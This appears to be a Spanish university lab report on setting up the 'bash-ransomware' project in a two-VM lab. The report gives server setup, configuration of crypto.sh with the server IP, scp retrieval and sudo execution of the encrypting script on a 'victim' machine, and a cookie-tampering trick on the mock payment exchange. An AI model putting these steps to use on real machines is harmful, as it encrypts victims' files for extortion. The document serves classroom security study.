TAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGA
 
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdfDesarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
 
Posnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativaPosnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativa
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
 
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTALINFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
 
absorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratoriosabsorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratorios
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Estructuras básicas_ conceptos básicos de programación.pdf
Estructuras básicas_  conceptos básicos de programación.pdfEstructuras básicas_  conceptos básicos de programación.pdf
Estructuras básicas_ conceptos básicos de programación.pdf
 
3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto
 

Bash Ransomware

  • 1. Universidad Tecnológica de Panamá Facultad de Ingeniería de Sistemas Computacionales Licenciatura en Ingeniería de Sistema de Información Curso: Tópicos 1 Proyecto #1 “Bash-Ransomware” Facilitador: Jose Moreno Integrantes: Berrocal, Abdiel 8-891-2399 Monteza, Otman 8-892-586 Grupo: 1IF-252
  • 2. En este proyecto se aborda el tema del ransomware. Se utilizó los scripts del repositorio en github: https://github.com/SubtleScope/bash-ransomware. El desarrollo de este proyecto consta de utilizar dos máquinas: una que es el servidor donde se montarán los scripts del repositorio anteriormente mencionado y otra máquina que nos servirá como cliente o víctima para este caso. En la máquina víctima se ejecutará un script que cifrará todos los archivos del mismo. Paso 1: Crear una máquina virtual (Ubuntu server) que será la máquina server, en la cual se montarán los scripts. Para la segunda máquina podemos hacer un clon de la primera, ya que solo ejecutaremos el script de cifrado en ella. Figura #1 Paso 2: Una vez encendida la máquina (Ransom-ServerSide) procederemos a descargar los archivos del repositorio. Utilizamos el comando git clone para clonar el repositorio en la máquina. Comando: git clone https://github.com/SubtleScope/bash-ransomware Figura #2 Paso 3: Copiamos el contenido de la carpeta bash-ransomware en la dirección /var/www/html
  • 3. Le cambiamos los permisos con: chown -R www-data:root /var/www/html Figura #3 Paso 4: Dentro de la carpeta html se encuentran los archivos del repositorio que habíamos clonado con anterioridad. En estos debemos realizar ciertas configuraciones que la guía en github nos indican. Imagen #4 En el archivo “target.php” debemos cambiar las líneas donde se manejan las variables de tiempo (fecha y hora). Figura #5
  • 4. Paso 5: Creación de la llave y certificados con openssl. Figura #6 Una vez hecho esto, los movemos a la siguiente dirección: /etc/ssl/. En esta existen dos carpetas: certs y private. Los moveremos de la siguiente manera: Comando para mover el server.crt: mv server.crt /etc/ssl/certs/ Comando para mover el server.key: mv server.key /etc/ssl/private/ Imagen #7 Lo siguiente que haremos es reiniciar el ssl con el comando: a2enmod ssl. Después reiniciamos el apache con: systemctl restart apache2. Paso 6: seguimos con las configuraciones, ahora es con el archivo “crypto.sh”. Primero nos dirigimos a la dirección “/var/www/html” si no nos encontrábamos allí desde antes. Creamos la carpeta “downloads” con el comando mkdir (Ej. mkdir downloads). Configuramos el archivo crypto.sh con lo siguiente: Figura #8 La primera línea nos indica que en todo el archivo cuando encuentre la cadena “192.168.1.132” lo cambie por las Y’s (estas Y’s son la Ip de nuestro servidor). La segunda línea es si lo queremos cambiar por un dominio.
  • 5. Copiamos el archivo “crypto.sh” en la carpeta que habíamos creado “downloads”. Paso 7: creación de la base de datos victims y exchange. Creación de “victims”: Figura #9 Figura #10 Creación de “exchange”: Figura #11 Figura #12
  • 6. Paso 8: lado del cliente o víctima. Procedemos a descargar el archivo “crypto.sh”, que es el encargado de cifrar la máquina cliente (víctima), utilizando el comando “scp” (secure copy) el cual se comunica con ssh. Comando: scp -P [#puerto] [user]@[serverip]:/dirección/para/copiar /dirección/para/pegar O el Comando: scp -P [#puerto] [user]@[serverip]:/dirección/origen /dirección/destino Ejemplo: si el #puerto es distinto de 22 se debe escribir después de la opción -P, de otro modo se puede dejar así. Comando: scp user@YYY.YYY.YYY.YYY:/var/www/html/downloads/crypto.sh /home/user Figura #13 Nota: “cuando se ejecuta este comando nos presentará una huella digital para la conexión en el cual escribiremos “yes” para continuar, luego nos pedirá la contraseña del servidor al cual nos queremos conectar. Si la contraseña se ingresó correctamente nos descargará (copiará) el archivo que pedimos en la ruta de destino que elegimos.” El user se cambia por el nombre de usuario y las Y’s se cambian por la ip del server que se posea. Paso 9: ejecución del script “crypto.sh”. Estando aún en la máquina víctima le damos permiso 755 con el comando: “chmod 755 crypto.sh”. Luego lo ejecutamos utilizando sudo ./crypto.sh o si estamos en modo root, solamente teclear ./crypto.sh. Esperamos hasta que se termine de cifrar. Figura #14 Una vez finalizado el cifrado, nos mostrará un mensaje como el de la “figura #14” con la dirección a visitar y un “id”. https://192.168.227.100/decrypt.php en este caso.
  • 7. Paso 10: ingresar por medio del browser a la dirección dada en la “figura #14” Figura #15 Procedemos a ingresar el “id” que nos muestra en la “figura #14” Figura #16
  • 8. También podemos observar el tiempo que le queda y otra información en https://192.168.227.100/admin.php Figura #17 Paso 11: le damos click en “Pay here”. Figura #16. Nos dirigirá al sitio de pago donde haremos click en: “M4dH4t’z Exchange”. Figura #18
  • 9. Este a su vez nos dirigirá a esta otra página: Figura #19 En la “Figura #19” nos registraremos. Este nos dará un (1) bitcoin, sin embargo, para poder descifrar nuestros archivos necesitaremos 4 más. Nos registramos utilizando: Username: bobilibobili Password: 12345 Figura #20
  • 10. Paso 12: uso de la herramienta “Tamper Data”. Esta herramienta se puede instalar en el navegador Firefox (navegador utilizado para este proyecto). Solo debemos ir a instalar extensiones y buscar “Tamper data”. Figura #21 Figura #22
  • 11. Hacemos click en Tamper Data, luego en “Start” (iniciar). Una vez iniciado le damos click en registrar, esto accionará lo siguiente en el Tamper Data: Figura #23 Le hacemos click en “Tamper” Figura #24 Si nos fijamos en la figura #24 en la sección “Cookie” podemos observar la cantidad de bitcoins que nos están dando. En este caso lo modificaremos con otro valor distinto de uno (1), pero mayor a cinco (5), ya que para poder descifrar nuestros archivos necesitamos cinco (5) bitcoins, es solo para asegurarnos de tener los suficientes bitcoins. Le asignamos cincuenta (50) bitcoins en la sección “Cookie”.
  • 12. Figura #25 Le hacemos click en “OK” en la figura #25. Figura #26 Nos dará nuestro id de transacción el cual deberemos copiar.
  • 13. Paso 13: ingresar el id de transacción dado anteriormente. Figura #27 Luego le damos click en “Pay”. Nos mostrará el tiempo que debemos esperar para poder descifrar nuestros archivos. Figura #28 Paso 14: podemos observar nuevamente en https://192.168.227.100/admin.php si se realizó el pago. Figura #29
  • 14. Paso 15: descargar los archivos para descifrar. Figura #30 Paso 16: copiar los archivos descargados a la máquina víctima. Para este caso utilizamos una tercera máquina con BackBox, en el cual descargamos los archivos para descifrar y los copiaremos a la máquina victima utilizando el comando, anteriormente mencionado, “scp”. Esta vez el comando tendrá un ligero cambio, ya que copiaremos del BackBox a la máquina victima por lo que escribiremos el comando de esta manera. Comando: scp /dirección/backbox/copiar user@ipserver:/direccion/destino/pegado Figura #31 Ejecutamos el decrypto.sh en la máquina víctima con el comando sudo ./decrypto.sh o si estamos en modo root escribir solamente ./decrypto.sh y deberemos tener después nuestros archivos descifrados. Figura #32